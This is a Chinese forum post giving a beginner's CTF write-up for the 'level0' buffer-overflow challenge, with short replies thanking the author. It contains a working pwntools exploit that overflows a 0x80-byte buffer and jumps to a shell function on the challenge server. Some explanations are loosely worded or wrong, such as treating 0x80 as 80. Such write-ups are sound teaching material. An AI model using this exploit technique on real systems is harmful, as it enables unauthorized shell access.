吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 6737|回复: 53
收起左侧

[CTF] 攻防世界 level0 wp

  [复制链接]
pushsafe 发表于 2020-11-20 07:48
纯新手教程 如有错误的地方 请各位大佬指出.
利用的主要工具
IDA / olldly / Peil / python pwntools
level0

首先收集一下文件信息
64位程序
Arch: amd64-64-little 程序位数
RELRO:No Relro 开启无法修改got表
Stack: No canry found 开启则无法直接覆盖EIP让程序任意跳转,跳转后会进行cookie校验;但这项保护可以被绕过
NX开着(开启则shellcode无法被执行)
Pie: No pie(0x400000) 开启在每次程序运行地址都会变化,未开启则返回值括号内是程序的基址
然后将文件放入ida中进行查看

可以看到一个callsystem 和一个 vulnerable_function函数

打开vulnerable_function 按F5 进行反编译 可以看到 定义buf数组 长度0x80
下面
read
0 文件描述 默认0
&buf 为读出数据的缓冲区
0x200nll 为每次读取的字节数(是请求读取的字节数,读上来的数据保存在缓冲区buf中,同时文件的当前读写位置向后移)
所以限制了 buf的长度为80 但是 在读取的时候可以读取200字节的数据 就说明 存在溢出漏洞(覆盖掉前面80个字节 然后注入payload)

然后看到callsystem 是一个系统调用shell的权限.
可以将地址记录 然后进行指向.

然后回过头来看80buf


可以看到 在数组中还存在一个s 占用八个字符 所以覆盖的长度为 0x80 + 0x8
已知信息:
callsystem 调用 shell 位置 0x00400596
绕过长度 0x80 + 0x8
from pwn import *
👆调用python pwn库
r = remote(“220.249.52.133”,35488)
👆设置目标信息 remote(“address”,port)
payload = ‘A’*0x80 + ‘a’*0x8+p64(0x00400596)
👆构造payload A * 80 + a * 8 = 88 覆盖掉原本的数组 + p64(0x00400596)将溢出的地方指向系统调用shell的地址
r.recvuntil(“Hello, World\n”)
👆相当于接收到端口收集的信息 接收到\n,keepends指定保留\n
r.sendline(payload)
👆发送一行数据,相当于在末尾加\n
r.interactive()
👆与获取的shell进行交互

免费评分

参与人数 16吾爱币 +11 热心值 +14 收起 理由
liucx + 1 + 1 我很赞同!
白纸樱法 + 1 热心回复!
fengbolee + 1 + 1 用心讨论,共获提升!
zjun777 + 1 + 1 用心讨论,共获提升!
是安可呀 + 1 + 1 我很赞同!
Noslpum + 1 + 1 谢谢@Thanks!
cwj8922 + 1 + 1 用心讨论,共获提升!
战火恐龙 + 1 用心讨论,共获提升!
wh1sper + 1 + 1 我很赞同!
sdhswddlj + 1 谢谢@Thanks!
指尖花凉亦成伤 + 1 + 1 我很赞同!
哦卡卡 + 1 + 1 用心讨论,共获提升!
Laign + 1 用心讨论,共获提升!
O678O + 1 用心讨论,共获提升!
艾叶生 + 1 用心讨论,共获提升!
lfm333 + 1 用心讨论,共获提升!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

dmj7798913 发表于 2020-11-20 08:02
学习了,谢谢分享
mengfang1 发表于 2020-11-20 08:13
caolin1861 发表于 2020-11-20 08:22
神奇的阿阳 发表于 2020-11-20 08:36
学习学习,感谢分享
kantao 发表于 2020-11-20 08:37
留个脚印支持!!!!!!!!
lfm333 发表于 2020-11-20 08:38
支持一下,谢谢分享
闪闪闪 发表于 2020-11-20 08:51
学习学习
天舞轮书 发表于 2020-11-20 08:57
学习了,谢谢分享,daydayup
lnzhiling 发表于 2020-11-20 09:07
学习学习,感谢
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-26 14:29

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表